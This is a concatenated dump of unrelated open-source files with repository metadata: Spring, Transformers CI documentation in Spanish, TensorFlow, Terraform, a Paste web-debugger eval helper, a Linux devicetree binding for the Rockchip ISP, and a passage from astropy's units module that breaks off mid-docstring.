https://github.com/webpack/webpack
|
examples/common-chunk-and-vendor-chunk/template.md
|
/*
* Copyright 2002-present the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.scripting;
import org.springframework.beans.testfixture.beans.TestBean;
/**
* @author Juergen Hoeller
*/
public interface TestBeanAwareMessenger extends ConfigurableMessenger {
TestBean getTestBean();
void setTestBean(TestBean testBean);
}
|
java
|
github
|
https://github.com/spring-projects/spring-framework
|
spring-context/src/test/java/org/springframework/scripting/TestBeanAwareMessenger.java
|
<!---
Copyright 2020 The HuggingFace Team. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
⚠️ Note that this file is in Markdown but contain specific syntax for our doc-builder (similar to MDX) that may not be
rendered properly in your Markdown viewer.
-->
# Verificaciones en un Pull Request
Cuando abres un _pull request_ en 🤗 Transformers, se ejecutarán una serie de verificaciones para asegurarte de que el _patch_ que estás agregando no rompa nada existente. Estas verificaciones son de cuatro tipos:
- pruebas regulares
- creación de la documentación
- estilo del código y documentación
- consistencia del repositorio
En este documento, intentaremos explicar cuáles son esas diferentes verificaciones y el motivo detrás de ellas, así como también cómo depurarlas localmente si una falla en tu PR.
Recuerda que todas las verificaciones requieren que tengas una instalación de desarrollo:
```bash
pip install transformers[dev]
```
o una instalación editable:
```bash
pip install -e ".[dev]"
```
del repositorio de Transformers.
## Pruebas
Todos los procesos que comienzan con `ci/circleci: run_tests_` ejecutan partes del conjunto de pruebas de Transformers. Cada uno de esos procesos se enfoca en una parte de la biblioteca en un entorno determinado: por ejemplo, `ci/circleci: run_tests_pipelines_tf` ejecuta la prueba de _pipelines_ en un entorno donde solo está instalado TensorFlow.
Ten en cuenta que para evitar ejecutar pruebas cuando no hay un cambio real en los módulos que estás probando, solo se ejecuta una parte del conjunto de pruebas: se ejecuta una tarea auxiliar para determinar las diferencias en la biblioteca antes y después del PR (lo que GitHub te muestra en la pestaña "Files changes") y selecciona las pruebas afectadas por esa diferencia. Este auxiliar se puede ejecutar localmente usando:
```bash
python utils/tests_fetcher.py
```
desde el directorio raiz del repositorio de Transformers. Se ejecutará lo siguiente:
1. Verificación para cada archivo en el _diff_ si los cambios están en el código, solo en comentarios o _docstrings_. Solo los archivos con cambios reales de código se conservan.
2. Creación de un mapa interno que proporciona para cada archivo del código fuente de la biblioteca todos los archivos a los que impacta recursivamente. Se dice que el módulo A impacta al módulo B si el módulo B importa el módulo A. Para el impacto recursivo, necesitamos una cadena de módulos que va del módulo A al módulo B en la que cada módulo importa el anterior.
3. Aplicación de este mapa en los archivos recopilados en el paso 1, lo que nos da una lista de archivos modelo afectados por el PR.
4. Asignación de cada uno de esos archivos a sus archivos de prueba correspondientes y para obtener una la lista de pruebas a ejecutar.
Al ejecutar el _script_ localmente, debes obtener los resultados de los pasos 1, 3 y 4 impresos y así saber qué pruebas se ejecutarán. El _script_ también creará un archivo llamado `test_list.txt` que contiene la lista de pruebas para ejecutar, y puede ejecutarlas localmente con el siguiente comando:
```bash
python -m pytest -n 8 --dist=loadfile -rA -s $(cat test_list.txt)
```
En caso de que se te escape algo, el conjunto completo de pruebas también se ejecuta a diario.
## Creación de la documentación
El proceso `build_pr_documentation` compila y genera una vista previa de la documentación para asegurarse de que todo se vea bien una vez que se fusione tu PR. Un bot agregará un enlace para obtener una vista previa de la documentación en tu PR. Cualquier cambio que realices en el PR se actualiza automáticamente en la vista previa. Si la documentación no se genera, haz clic en **Detalles** junto al proceso fallido para ver dónde salió mal. A menudo, el error es tan simple como que falta un archivo en `toctree`.
Si estás interesado en compilar u obtener una vista previa de la documentación localmente, echa un vistazo al [`README.md`](https://github.com/huggingface/transformers/tree/main/docs) en la carpeta `docs`.
## Estilo de código y documentación.
El formato de código se aplica a todos los archivos fuente, los ejemplos y las pruebas utilizando `black` e `ruff`. También tenemos una herramienta personalizada que se ocupa del formato de los _docstrings_ y archivos `rst` (`utils/style_doc.py`), así como del orden de las importaciones _lazy_ realizadas en los archivos `__init__.py` de Transformers (`utils /custom_init_isort.py`). Todo esto se puede probar ejecutando
```bash
make style
```
CI verifica que se hayan aplicado dentro de la verificación `ci/circleci: check_code_quality`. También se ejecuta `ruff`, que hará una verificación básica a tu código y te hará saber si encuentra una variable no definida, o una que no se usa. Para ejecutar esa verificación localmente, usa
```bash
make check-repo
```
Este último comando también ejecutará todas las verificaciones adicionales para la consistencia del repositorio. Echemos un vistazo a estas pruebas.
## Consistencia del repositorio
Esta verificación reagrupa todas las pruebas para asegurarse de que tu PR deja el repositorio en buen estado, y se realiza mediante `ci/circleci: check_repository_consistency`. Puedes ejecutar localmente esta verificación ejecutando lo siguiente:
```bash
make check-repo
```
Esta instrucción verifica que:
- Todos los objetos agregados al _init_ están documentados (realizados por `utils/check_repo.py`)
- Todos los archivos `__init__.py` tienen el mismo contenido en sus dos secciones (realizado por `utils/check_inits.py`)
- Todo el código identificado como una copia de otro módulo es consistente con el original (realizado por `utils/check_copies.py`)
- Todas las clases de configuración tienen al menos _checkpoint_ válido mencionado en sus _docstrings_ (realizado por `utils/check_config_docstrings.py`)
- Las traducciones de los README y el índice del documento tienen la misma lista de modelos que el README principal (realizado por `utils/check_copies.py`)
- Las tablas generadas automaticamente en la documentación están actualizadas (realizadas por `utils/check_table.py`)
- La biblioteca tiene todos los objetos disponibles incluso si no están instaladas todas las dependencias opcionales (realizadas por `utils/check_dummies.py`)
Si esta verificación falla, los primeros dos elementos requieren una reparación manual, los últimos cuatro pueden repararse automáticamente ejecutando el comando
```bash
make fix-repo
```
Las verificaciones adicionales se refieren a los PRs que agregan nuevos modelos, principalmente que:
- Todos los modelos agregados están en un Auto-mapping (realizado por `utils/check_repo.py`)
<!-- TODO Sylvain, add a check that makes sure the common tests are implemented.-->
- Todos los modelos se verifican correctamente (realizados por `utils/check_repo.py`)
<!-- TODO Sylvain, add the following
- All models are added to the main README, inside the main doc
- All checkpoints used actually exist on the Hub
-->
|
unknown
|
github
|
https://github.com/huggingface/transformers
|
docs/source/es/pr_checks.md
|
/* Copyright 2022 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#ifndef TENSORFLOW_COMPILER_JIT_DEVICE_COMPILER_CLIENT_H_
#define TENSORFLOW_COMPILER_JIT_DEVICE_COMPILER_CLIENT_H_
#include <optional>
#include <string>
#include <variant>
#include "tensorflow/compiler/tf2xla/xla_compiler.h"
#include "xla/client/executable_build_options.h"
namespace tensorflow {
template <typename ExecutableType, typename ClientType>
class DeviceCompilerClient {
public:
DeviceCompilerClient() = default;
virtual ~DeviceCompilerClient() = default;
// Compiles `result` (HLO) to an `ExecutableType` using `ClientType` and
// returns it.
virtual StatusOr<std::unique_ptr<ExecutableType>> BuildExecutable(
const XlaCompiler::Options& options,
const XlaCompiler::CompilationResult& result) = 0;
// Serializes an available `executable` to string using `ClientType` and
// returns it.
virtual absl::StatusOr<std::string> SerializeExecutable(
const ExecutableType& executable) = 0;
// Compiles `result` (HLO) to a serializable executable (eg.
// xla::AotCompilationResult) using `ClientType`, serializes it to string and
// returns it.
virtual absl::StatusOr<std::string> BuildSerializedExecutable(
const XlaCompiler::Options& options,
const XlaCompiler::CompilationResult& result) = 0;
// Loads `serialized_executable` into an `ExecutableType` using `ClientType`.
virtual StatusOr<std::unique_ptr<ExecutableType>> LoadExecutable(
const XlaCompiler::Options& options,
const XlaCompiler::CompilationResult& result,
const std::string& serialized_executable) = 0;
// Waits for the underlying `ClientType` backend's programs to finish
// executing before returning.
virtual void WaitForProgramsToFinish() = 0;
virtual ClientType* client() const = 0;
private:
DeviceCompilerClient(const DeviceCompilerClient&) = delete;
void operator=(const DeviceCompilerClient&) = delete;
};
// Generates the ExecutableBuildOptions for compilation from HLO to
// executable.
xla::ExecutableBuildOptions GetExecutableBuildOptions(
const XlaCompiler::Options& options,
const XlaCompiler::CompilationResult& result, int default_device_ordinal);
} // namespace tensorflow
#endif // TENSORFLOW_COMPILER_JIT_DEVICE_COMPILER_CLIENT_H_
|
c
|
github
|
https://github.com/tensorflow/tensorflow
|
tensorflow/compiler/jit/device_compiler_client.h
|
// Copyright (c) HashiCorp, Inc.
// SPDX-License-Identifier: BUSL-1.1
package workdir
import (
"path/filepath"
)
// NormalizePath attempts to transform the given path so that it's relative
// to the working directory, which is our preferred way to present and store
// paths to files and directories within a configuration so that they can
// be portable to operations in other working directories.
//
// It isn't always possible to produce a relative path. For example, on Windows
// the given path might be on a different volume (e.g. drive letter or network
// share) than the working directory.
//
// Note that the result will be relative to the main directory of the receiver,
// which should always be the actual process working directory in normal code,
// but might be some other temporary working directory when in test code.
// If you need to access the file or directory that the result refers to with
// functions that aren't aware of our base directory, you can use something
// like the following, which again should be needed only in test code which
// might need to inspect the filesystem in order to make assertions:
//
// filepath.Join(d.RootModuleDir(), normalizePathResult)
//
// The above is suitable only for situations where the given path is known
// to be beneath the working directory, which is the typical situation for
// temporary working directories created for automated tests.
func (d *Dir) NormalizePath(given string) string {
// We need an absolute version of d.mainDir in order for our "Rel"
// result to be reliable.
absMain, err := filepath.Abs(d.mainDir)
if err != nil {
// Weird, but okay...
return filepath.Clean(given)
}
if !filepath.IsAbs(given) {
given = filepath.Join(absMain, given)
}
ret, err := filepath.Rel(absMain, given)
if err != nil {
// It's not always possible to find a relative path. For example,
// the given path might be on an entirely separate volume
// (e.g. drive letter or network share) on a Windows system, which
// always requires an absolute path.
return filepath.Clean(given)
}
return ret
}
|
go
|
github
|
https://github.com/hashicorp/terraform
|
internal/command/workdir/normalize_path.go
|
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
from six.moves import cStringIO as StringIO
import traceback
import threading
import pdb
import six
import sys
exec_lock = threading.Lock()
class EvalContext(object):
"""
Class that represents a interactive interface. It has its own
namespace. Use eval_context.exec_expr(expr) to run commands; the
output of those commands is returned, as are print statements.
This is essentially what doctest does, and is taken directly from
doctest.
"""
def __init__(self, namespace, globs):
self.namespace = namespace
self.globs = globs
def exec_expr(self, s):
out = StringIO()
exec_lock.acquire()
save_stdout = sys.stdout
try:
debugger = _OutputRedirectingPdb(save_stdout)
debugger.reset()
pdb.set_trace = debugger.set_trace
sys.stdout = out
try:
code = compile(s, '<web>', "single", 0, 1)
six.exec_(code, self.globs, self.namespace)
debugger.set_continue()
except KeyboardInterrupt:
raise
except:
traceback.print_exc(file=out)
debugger.set_continue()
finally:
sys.stdout = save_stdout
exec_lock.release()
return out.getvalue()
# From doctest
class _OutputRedirectingPdb(pdb.Pdb):
"""
A specialized version of the python debugger that redirects stdout
to a given stream when interacting with the user. Stdout is *not*
redirected when traced code is executed.
"""
def __init__(self, out):
self.__out = out
pdb.Pdb.__init__(self)
def trace_dispatch(self, *args):
# Redirect stdout to the given stream.
save_stdout = sys.stdout
sys.stdout = self.__out
# Call Pdb's trace dispatch method.
try:
return pdb.Pdb.trace_dispatch(self, *args)
finally:
sys.stdout = save_stdout
|
unknown
|
codeparrot/codeparrot-clean
| ||
# SPDX-License-Identifier: (GPL-2.0+ OR MIT)
%YAML 1.2
---
$id: http://devicetree.org/schemas/media/rockchip-isp1.yaml#
$schema: http://devicetree.org/meta-schemas/core.yaml#
title: Rockchip SoC Image Signal Processing unit v1
maintainers:
- Helen Koike <helen.koike@collabora.com>
description: |
Rockchip ISP1 is the Camera interface for the Rockchip series of SoCs
which contains image processing, scaling, and compression functions.
properties:
compatible:
enum:
- fsl,imx8mp-isp
- rockchip,px30-cif-isp
- rockchip,rk3399-cif-isp
reg:
maxItems: 1
interrupts:
minItems: 1
maxItems: 3
interrupt-names:
items:
- const: isp
- const: mi
- const: mipi
clocks:
minItems: 3
items:
# isp0 and isp1
- description: ISP clock (for imx8mp, clk)
- description: ISP AXI clock (for imx8mp, m_hclk)
- description: ISP AHB clock (for imx8mp, hclk)
# only for isp1
- description: ISP Pixel clock
clock-names:
minItems: 3
items:
# isp0 and isp1
- const: isp
- const: aclk
- const: hclk
# only for isp1
- const: pclk
fsl,blk-ctrl:
$ref: /schemas/types.yaml#/definitions/phandle-array
maxItems: 1
description:
A phandle to the media block control for the ISP, followed by a cell
containing the index of the gasket.
iommus:
maxItems: 1
phys:
maxItems: 1
description: phandle for the PHY port
phy-names:
const: dphy
power-domains:
minItems: 1
items:
- description: ISP power domain
- description: MIPI CSI-2 power domain
power-domain-names:
minItems: 1
items:
- const: isp
- const: csi2
ports:
$ref: /schemas/graph.yaml#/properties/ports
properties:
port@0:
$ref: /schemas/graph.yaml#/$defs/port-base
unevaluatedProperties: false
description: connection point for sensors at MIPI-DPHY RX0
properties:
endpoint:
$ref: video-interfaces.yaml#
unevaluatedProperties: false
properties:
data-lanes:
minItems: 1
maxItems: 4
port@1:
$ref: /schemas/graph.yaml#/$defs/port-base
unevaluatedProperties: false
description: connection point for input on the parallel interface
properties:
endpoint:
$ref: video-interfaces.yaml#
unevaluatedProperties: false
properties:
bus-type:
enum: [5, 6]
required:
- bus-type
anyOf:
- required:
- port@0
- required:
- port@1
required:
- compatible
- reg
- interrupts
- clocks
- clock-names
- power-domains
- ports
allOf:
- if:
properties:
compatible:
contains:
const: rockchip,rk3399-cif-isp
then:
properties:
clocks:
minItems: 3
maxItems: 4
clock-names:
minItems: 3
maxItems: 4
- if:
properties:
compatible:
contains:
const: rockchip,px30-cif-isp
then:
required:
- interrupt-names
- if:
properties:
compatible:
contains:
const: fsl,imx8mp-isp
then:
properties:
clocks:
minItems: 4
clock-names:
minItems: 4
iommus: false
phys: false
phy-names: false
power-domains:
minItems: 2
power-domain-names:
minItems: 2
required:
- fsl,blk-ctrl
- power-domain-names
else:
properties:
fsl,blk-ctrl: false
power-domains:
maxItems: 1
power-domain-names: false
required:
- iommus
- phys
- phy-names
additionalProperties: false
examples:
- |
#include <dt-bindings/clock/rk3399-cru.h>
#include <dt-bindings/interrupt-controller/arm-gic.h>
#include <dt-bindings/power/rk3399-power.h>
parent0: parent {
#address-cells = <2>;
#size-cells = <2>;
isp0: isp0@ff910000 {
compatible = "rockchip,rk3399-cif-isp";
reg = <0x0 0xff910000 0x0 0x4000>;
interrupts = <GIC_SPI 43 IRQ_TYPE_LEVEL_HIGH 0>;
clocks = <&cru SCLK_ISP0>,
<&cru ACLK_ISP0_WRAPPER>,
<&cru HCLK_ISP0_WRAPPER>;
clock-names = "isp", "aclk", "hclk";
iommus = <&isp0_mmu>;
phys = <&dphy>;
phy-names = "dphy";
power-domains = <&power RK3399_PD_ISP0>;
ports {
#address-cells = <1>;
#size-cells = <0>;
port@0 {
reg = <0>;
#address-cells = <1>;
#size-cells = <0>;
mipi_in_wcam: endpoint@0 {
reg = <0>;
remote-endpoint = <&wcam_out>;
data-lanes = <1 2>;
};
mipi_in_ucam: endpoint@1 {
reg = <1>;
remote-endpoint = <&ucam_out>;
data-lanes = <1>;
};
};
};
};
i2c7: i2c {
#address-cells = <1>;
#size-cells = <0>;
wcam: camera@36 {
compatible = "ovti,ov5695";
reg = <0x36>;
clocks = <&cru SCLK_TESTCLKOUT1>;
port {
wcam_out: endpoint {
remote-endpoint = <&mipi_in_wcam>;
data-lanes = <1 2>;
};
};
};
ucam: camera@3c {
compatible = "ovti,ov2685";
reg = <0x3c>;
clocks = <&cru SCLK_TESTCLKOUT1>;
clock-names = "xvclk";
avdd-supply = <&pp2800_cam>;
dovdd-supply = <&pp1800>;
dvdd-supply = <&pp1800>;
port {
ucam_out: endpoint {
remote-endpoint = <&mipi_in_ucam>;
data-lanes = <1>;
};
};
};
};
};
- |
#include <dt-bindings/interrupt-controller/arm-gic.h>
#include <dt-bindings/power/px30-power.h>
parent1: parent {
#address-cells = <2>;
#size-cells = <2>;
isp: isp@ff4a0000 {
compatible = "rockchip,px30-cif-isp";
reg = <0x0 0xff4a0000 0x0 0x8000>;
interrupts = <GIC_SPI 70 IRQ_TYPE_LEVEL_HIGH>,
<GIC_SPI 73 IRQ_TYPE_LEVEL_HIGH>,
<GIC_SPI 74 IRQ_TYPE_LEVEL_HIGH>;
interrupt-names = "isp", "mi", "mipi";
clocks = <&cru SCLK_ISP0>,
<&cru ACLK_ISP0_WRAPPER>,
<&cru HCLK_ISP0_WRAPPER>,
<&cru PCLK_ISP1_WRAPPER>;
clock-names = "isp", "aclk", "hclk", "pclk";
iommus = <&isp_mmu>;
phys = <&csi_dphy>;
phy-names = "dphy";
power-domains = <&power PX30_PD_VI>;
ports {
#address-cells = <1>;
#size-cells = <0>;
port@0 {
reg = <0>;
#address-cells = <1>;
#size-cells = <0>;
mipi_in_ucam1: endpoint@0 {
reg = <0>;
remote-endpoint = <&ucam1_out>;
data-lanes = <1 2>;
};
};
};
};
i2c2: i2c {
#address-cells = <1>;
#size-cells = <0>;
ov5695: camera@36 {
compatible = "ovti,ov5647";
reg = <0x36>;
clocks = <&cru SCLK_CIF_OUT>;
port {
ucam1_out: endpoint {
remote-endpoint = <&mipi_in_ucam1>;
data-lanes = <1 2>;
};
};
};
};
};
|
unknown
|
github
|
https://github.com/torvalds/linux
|
Documentation/devicetree/bindings/media/rockchip-isp1.yaml
|
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Core units classes and functions
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from ..extern import six
from ..extern.six.moves import zip
import inspect
import operator
import textwrap
import warnings
import numpy as np
from ..utils.decorators import lazyproperty, deprecated
from ..utils.exceptions import AstropyWarning
from ..utils.misc import isiterable, InheritDocstrings
from .utils import (is_effectively_unity, sanitize_scale, validate_power,
resolve_fractions)
from . import format as unit_format
if six.PY2:
import cmath
__all__ = [
'UnitsError', 'UnitsWarning', 'UnitConversionError', 'UnitTypeError',
'UnitBase', 'NamedUnit', 'IrreducibleUnit', 'Unit', 'CompositeUnit',
'PrefixUnit', 'UnrecognizedUnit', 'def_unit', 'get_current_unit_registry',
'set_enabled_units', 'add_enabled_units',
'set_enabled_equivalencies', 'add_enabled_equivalencies',
'dimensionless_unscaled', 'one']
def _flatten_units_collection(items):
"""
Given a list of sequences, modules or dictionaries of units, or
single units, return a flat set of all the units found.
"""
if not isinstance(items, list):
items = [items]
result = set()
for item in items:
if isinstance(item, UnitBase):
result.add(item)
else:
if isinstance(item, dict):
units = item.values()
elif inspect.ismodule(item):
units = vars(item).values()
elif isiterable(item):
units = item
else:
continue
for unit in units:
if isinstance(unit, UnitBase):
result.add(unit)
return result
def _normalize_equivalencies(equivalencies):
"""
Normalizes equivalencies, ensuring each is a 4-tuple of the form::
(from_unit, to_unit, forward_func, backward_func)
Parameters
----------
equivalencies : list of equivalency pairs
Raises
------
ValueError if an equivalency cannot be interpreted
"""
if equivalencies is None:
return []
normalized = []
for i, equiv in enumerate(equivalencies):
if len(equiv) == 2:
funit, tunit = equiv
a = b = lambda x: x
elif len(equiv) == 3:
funit, tunit, a = equiv
b = a
elif len(equiv) == 4:
funit, tunit, a, b = equiv
else:
raise ValueError(
"Invalid equivalence entry {0}: {1!r}".format(i, equiv))
if not (funit is Unit(funit) and
(tunit is None or tunit is Unit(tunit)) and
six.callable(a) and
six.callable(b)):
raise ValueError(
"Invalid equivalence entry {0}: {1!r}".format(i, equiv))
normalized.append((funit, tunit, a, b))
return normalized
class _UnitRegistry(object):
"""
Manages a registry of the enabled units.
"""
def __init__(self, init=[], equivalencies=[]):
if isinstance(init, _UnitRegistry):
# If passed another registry we don't need to rebuild everything.
# but because these are mutable types we don't want to create
# conflicts so everything needs to be copied.
self._equivalencies = init._equivalencies.copy()
self._all_units = init._all_units.copy()
self._registry = init._registry.copy()
self._non_prefix_units = init._non_prefix_units.copy()
# The physical type is a dictionary containing sets as values.
# All of these must be copied otherwise we could alter the old
# registry.
self._by_physical_type = {k: v.copy() for k, v in
six.iteritems(init._by_physical_type)}
else:
self._reset_units()
self._reset_equivalencies()
self.add_enabled_units(init)
self.add_enabled_equivalencies(equivalencies)
def _reset_units(self):
self._all_units = set()
self._non_prefix_units = set()
self._registry = {}
self._by_physical_type = {}
def _reset_equivalencies(self):
self._equivalencies = set()
@property
def registry(self):
return self._registry
@property
def all_units(self):
return self._all_units
@property
def non_prefix_units(self):
return self._non_prefix_units
def set_enabled_units(self, units):
"""
Sets the units enabled in the unit registry.
These units are searched when using
`UnitBase.find_equivalent_units`, for example.
Parameters
----------
units : list of sequences, dicts, or modules containing units, or units
This is a list of things in which units may be found
(sequences, dicts or modules), or units themselves. The
entire set will be "enabled" for searching through by
methods like `UnitBase.find_equivalent_units` and
`UnitBase.compose`.
"""
self._reset_units()
return self.add_enabled_units(units)
def add_enabled_units(self, units):
"""
Adds to the set of units enabled in the unit registry.
These units are searched when using
`UnitBase.find_equivalent_units`, for example.
Parameters
----------
units : list of sequences, dicts, or modules containing units, or units
This is a list of things in which units may be found
(sequences, dicts or modules), or units themselves. The
entire set will be added to the "enabled" set for
searching through by methods like
`UnitBase.find_equivalent_units` and `UnitBase.compose`.
"""
units = _flatten_units_collection(units)
for unit in units:
# Loop through all of the names first, to ensure all of them
# are new, then add them all as a single "transaction" below.
for st in unit._names:
if (st in self._registry and unit != self._registry[st]):
raise ValueError(
"Object with name {0!r} already exists in namespace. "
"Filter the set of units to avoid name clashes before "
"enabling them.".format(st))
for st in unit._names:
self._registry[st] = unit
self._all_units.add(unit)
if not isinstance(unit, PrefixUnit):
self._non_prefix_units.add(unit)
hash = unit._get_physical_type_id()
self._by_physical_type.setdefault(hash, set()).add(unit)
def get_units_with_physical_type(self, unit):
"""
Get all units in the registry with the same physical type as
the given unit.
Parameters
----------
unit : UnitBase instance
"""
return self._by_physical_type.get(unit._get_physical_type_id(), set())
@property
def equivalencies(self):
return list(self._equivalencies)
def set_enabled_equivalencies(self, equivalencies):
"""
Sets the equivalencies enabled in the unit registry.
These equivalencies are used if no explicit equivalencies are given,
both in unit conversion and in finding equivalent units.
This is meant in particular for allowing angles to be dimensionless.
Use with care.
Parameters
----------
equivalencies : list of equivalent pairs
E.g., as returned by
`~astropy.units.equivalencies.dimensionless_angles`.
"""
self._reset_equivalencies()
return self.add_enabled_equivalencies(equivalencies)
def add_enabled_equivalencies(self, equivalencies):
"""
Adds to the set of equivalencies enabled in the unit registry.
These equivalencies are used if no explicit equivalencies are given,
both in unit conversion and in finding equivalent units.
This is meant in particular for allowing angles to be dimensionless.
Use with care.
Parameters
----------
equivalencies : list of equivalent pairs
E.g., as returned by
`~astropy.units.equivalencies.dimensionless_angles`.
"""
# pre-normalize list to help catch mistakes
equivalencies = _normalize_equivalencies(equivalencies)
self._equivalencies |= set(equivalencies)
class _UnitContext(object):
def __init__(self, init=[], equivalencies=[]):
_unit_registries.append(
_UnitRegistry(init=init, equivalencies=equivalencies))
def __enter__(self):
pass
def __exit__(self, type, value, tb):
_unit_registries.pop()
_unit_registries = [_UnitRegistry()]
def get_current_unit_registry():
return _unit_registries[-1]
def set_enabled_units(units):
"""
Sets the units enabled in the unit registry.
These units are searched when using
`UnitBase.find_equivalent_units`, for example.
This may be used either permanently, or as a context manager using
the ``with`` statement (see example below).
Parameters
----------
units : list of sequences, dicts, or modules containing units, or units
This is a list of things in which units may be found
(sequences, dicts or modules), or units themselves. The
entire set will be "enabled" for searching through by methods
like `UnitBase.find_equivalent_units` and `UnitBase.compose`.
Examples
--------
>>> from astropy import units as u
>>> with u.set_enabled_units([u.pc]):
... u.m.find_equivalent_units()
...
Primary name | Unit definition | Aliases
[
pc | 3.08568e+16 m | parsec ,
]
>>> u.m.find_equivalent_units()
Primary name | Unit definition | Aliases
[
AU | 1.49598e+11 m | au, astronomical_unit ,
Angstrom | 1e-10 m | AA, angstrom ,
cm | 0.01 m | centimeter ,
earthRad | 6.3568e+06 m | R_earth, Rearth ,
jupiterRad | 7.1492e+07 m | R_jup, Rjup, R_jupiter, Rjupiter ,
lyr | 9.46073e+15 m | lightyear ,
m | irreducible | meter ,
micron | 1e-06 m | ,
pc | 3.08568e+16 m | parsec ,
solRad | 6.957e+08 m | R_sun, Rsun ,
]
"""
# get a context with a new registry, using equivalencies of the current one
context = _UnitContext(
equivalencies=get_current_unit_registry().equivalencies)
# in this new current registry, enable the units requested
get_current_unit_registry().set_enabled_units(units)
return context
def add_enabled_units(units):
"""
Adds to the set of units enabled in the unit registry.
These units are searched when using
`UnitBase.find_equivalent_units`, for example.
This may be used either permanently, or as a context manager using
the ``with`` statement (see example below).
Parameters
----------
units : list of sequences, dicts, or modules containing units, or units
This is a list of things in which units may be found
(sequences, dicts or modules), or units themselves. The
entire set will be added to the "enabled" set for searching
through by methods like `UnitBase.find_equivalent_units` and
`UnitBase.compose`.
Examples
--------
>>> from astropy import units as u
>>> from astropy.units import imperial
>>> with u.add_enabled_units(imperial):
... u.m.find_equivalent_units()
...
Primary name | Unit definition | Aliases
[
AU | 1.49598e+11 m | au, astronomical_unit ,
Angstrom | 1e-10 m | AA, angstrom ,
cm | 0.01 m | centimeter ,
earthRad | 6.3568e+06 m | R_earth, Rearth ,
ft | 0.3048 m | foot ,
fur | 201.168 m | furlong ,
inch | 0.0254 m | ,
jupiterRad | 7.1492e+07 m | R_jup, Rjup, R_jupiter, Rjupiter ,
lyr | 9.46073e+15 m | lightyear ,
m | irreducible | meter ,
mi | 1609.34 m | mile ,
micron | 1e-06 m | ,
mil | 2.54e-05 m | thou ,
nmi | 1852 m | nauticalmile, NM ,
pc | 3.08568e+16 m | parsec ,
solRad | 6.957e+08 m | R_sun, Rsun ,
yd | 0.9144 m | yard ,
]
"""
# get a context with a new registry, which is a copy of the current one
context = _UnitContext(get_current_unit_registry())
# in this new current registry, enable the further units requested
get_current_unit_registry().add_enabled_units(units)
return context
def set_enabled_equivalencies(equivalencies):
"""
Sets the equivalencies enabled in the unit registry.
These equivalencies are used if no explicit equivalencies are given,
both in unit conversion and in finding equivalent units.
This is meant in particular for allowing angles to be dimensionless.
Use with care.
Parameters
----------
equivalencies : list of equivalent pairs
E.g., as returned by
`~astropy.units.equivalencies.dimensionless_angles`.
Examples
--------
Exponentiation normally requires dimensionless quantities. To avoid
problems with complex phases::
>>> from astropy import units as u
>>> with u.set_enabled_equivalencies(u.dimensionless_angles()):
... phase = 0.5 * u.cycle
... np.exp(1j*phase) # doctest: +FLOAT_CMP
<Quantity (-1+1.2246063538223773e-16j)>
"""
# get a context with a new registry, using all units of the current one
context = _UnitContext(get_current_unit_registry())
# in this new current registry, enable the equivalencies requested
get_current_unit_registry().set_enabled_equivalencies(equivalencies)
return context
def add_enabled_equivalencies(equivalencies):
"""
Adds to the equivalencies enabled in the unit registry.
These equivalencies are used if no explicit equivalencies are given,
both in unit conversion and in finding equivalent units.
This is meant in particular for allowing angles to be dimensionless.
Since no equivalencies are enabled by default, generally it is recommended
to use `set_enabled_equivalencies`.
Parameters
----------
equivalencies : list of equivalent pairs
E.g., as returned by
`~astropy.units.equivalencies.dimensionless_angles`.
"""
# get a context with a new registry, which is a copy of the current one
context = _UnitContext(get_current_unit_registry())
# in this new current registry, enable the further equivalencies requested
get_current_unit_registry().add_enabled_equivalencies(equivalencies)
return context
class UnitsError(Exception):
"""
The base class for unit-specific exceptions.
"""
class UnitScaleError(UnitsError, ValueError):
"""
Used to catch the errors involving scaled units,
which are not recognized by FITS format.
"""
pass
class UnitConversionError(UnitsError, ValueError):
"""
Used specifically for errors related to converting between units or
interpreting units in terms of other units.
"""
class UnitTypeError(UnitsError, TypeError):
"""
Used specifically for errors in setting to units not allowed by a class.
E.g., would be raised if the unit of an `~astropy.coordinates.Angle`
instances were set to a non-angular unit.
"""
class UnitsWarning(AstropyWarning):
"""
The base class for unit-specific warnings.
"""
@six.add_metaclass(InheritDocstrings)
class UnitBase(object):
"""
Abstract base class for units.
Most of the arithmetic operations on units are defined in this
base class.
Should not be instantiated by users directly.
"""
# Make sure that __rmul__ of units gets called over the __mul__ of Numpy
# arrays to avoid element-wise multiplication.
__array_priority__ = 1000
def __deepcopy__(self, memo):
# This may look odd, but the units conversion will be very
# broken after deep-copying if we don't guarantee that a given
# physical unit corresponds to only one instance
return self
def _repr_latex_(self):
"""
Generate latex representation of unit name. This is used by
the IPython notebook to print a unit with a nice layout.
Returns
-------
Latex string
"""
return unit_format.Latex.to_string(self)
def __bytes__(self):
"""Return string representation for unit"""
return unit_format.Generic.to_string(self).encode('unicode_escape')
if six.PY2:
__str__ = __bytes__
def __unicode__(self):
"""Return string representation for unit"""
return unit_format.Generic.to_string(self)
if not six.PY2:
__str__ = __unicode__
def __repr__(self):
string = unit_format.Generic.to_string(self)
if six.PY2:
string = string.encode('unicode_escape')
return 'Unit("{0}")'.format(string)
def _get_physical_type_id(self):
"""
Returns an identifier that uniquely identifies the physical
type of this unit. It is comprised of the bases and powers of
this unit, without the scale. Since it is hashable, it is
